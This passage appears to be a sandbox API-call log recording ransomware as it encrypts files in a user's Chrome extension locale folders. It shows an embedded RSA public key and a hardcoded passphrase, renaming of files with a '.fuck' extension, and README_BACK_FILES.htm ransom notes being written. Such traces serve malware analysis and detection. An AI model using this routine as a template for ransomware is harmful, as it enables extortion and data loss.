(lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0257.830] CryptDestroyHash (hHash=0x2e7fac0) returned 1 [0257.830] CryptDestroyKey (hKey=0x2e7ff00) returned 1 [0257.830] CryptReleaseContext (hProv=0x2e78f38, dwFlags=0x0) returned 1 [0257.830] FindNextFileA (in: hFindFile=0x2e7fe40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.830] FindClose (in: hFindFile=0x2e7fe40 | out: hFindFile=0x2e7fe40) returned 1 [0257.830] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0257.830] AreFileApisANSI () returned 1 [0257.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0257.830] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.831] GetFileType (hFile=0x5d50) returned 0x1 [0257.831] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.833] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.833] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7ff40 [0257.834] FindNextFileA (in: hFindFile=0x2e7ff40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.834] FindNextFileA (in: hFindFile=0x2e7ff40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.834] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.834] GetLastError () returned 0x0 [0257.834] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json")) returned 0x20 [0257.834] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0257.835] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.835] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.837] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.837] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0257.842] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.842] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.842] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.842] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fd00) returned 1 [0257.842] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.842] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.842] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79bf8) returned 1 [0257.842] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79bf8, dwCertEncodingType=0x1, pInfo=0x2e245a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e245d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e245d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e80000) returned 1 [0257.842] CryptEncrypt (in: hKey=0x2e80000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.842] CryptEncrypt (in: hKey=0x2e80000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79d90*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79d90*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.843] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e79d90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79d90*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.843] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xaf, lpOverlapped=0x0) returned 1 [0257.844] CryptEncrypt (in: hKey=0x2e7fd00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xaf, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0257.844] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0257.844] CloseHandle (hObject=0x5d5c) returned 1 [0257.844] CloseHandle (hObject=0x5d60) returned 1 [0257.845] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0257.847] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0257.848] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.gsg")) returned 1 [0257.849] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\messages.json.fuck")) returned 1 [0257.850] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0257.850] CryptDestroyKey (hKey=0x2e7fd00) returned 1 [0257.850] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0257.850] FindNextFileA (in: hFindFile=0x2e7ff40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.850] FindClose (in: hFindFile=0x2e7ff40 | out: hFindFile=0x2e7ff40) returned 1 [0257.850] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0257.850] AreFileApisANSI () returned 1 [0257.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.850] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.851] GetFileType (hFile=0x5d50) returned 0x1 [0257.851] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.852] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.852] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e80040 [0257.852] FindNextFileA (in: hFindFile=0x2e80040, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.852] FindNextFileA (in: hFindFile=0x2e80040, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.852] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.852] GetLastError () returned 0x0 [0257.852] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json")) returned 0x20 [0257.852] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0257.853] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.853] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.854] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.854] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79268) returned 1 [0257.856] CryptCreateHash (in: hProv=0x2e79268, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.856] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.857] CryptHashData (hHash=0x2e7ff40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.857] CryptDeriveKey (in: hProv=0x2e79268, Algid=0x6610, hBaseData=0x2e7ff40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fac0) returned 1 [0257.857] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.857] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.857] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e78f38) returned 1 [0257.857] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78f38, dwCertEncodingType=0x1, pInfo=0x2e25370*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e253a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e253a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fd00) returned 1 [0257.857] CryptEncrypt (in: hKey=0x2e7fd00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.857] CryptEncrypt (in: hKey=0x2e7fd00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79378*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79378*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.857] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e79378*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79378*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.858] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x119, lpOverlapped=0x0) returned 1 [0257.859] CryptEncrypt (in: hKey=0x2e7fac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x119, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0257.859] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0257.859] CloseHandle (hObject=0x5d60) returned 1 [0257.859] CloseHandle (hObject=0x5d5c) returned 1 [0257.859] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0257.862] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0257.863] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.gsg")) returned 1 [0257.864] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\messages.json.fuck")) returned 1 [0257.865] CryptDestroyHash (hHash=0x2e7ff40) returned 1 [0257.865] CryptDestroyKey (hKey=0x2e7fac0) returned 1 [0257.865] CryptReleaseContext (hProv=0x2e79268, dwFlags=0x0) returned 1 [0257.865] FindNextFileA (in: hFindFile=0x2e80040, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.865] FindClose (in: hFindFile=0x2e80040 | out: hFindFile=0x2e80040) returned 1 [0257.865] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0257.865] AreFileApisANSI () returned 1 [0257.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.865] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.866] GetFileType (hFile=0x5d50) returned 0x1 [0257.866] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.868] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.868] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0257.869] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.869] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.869] GetSystemTimePreciseAsFileTime (in: 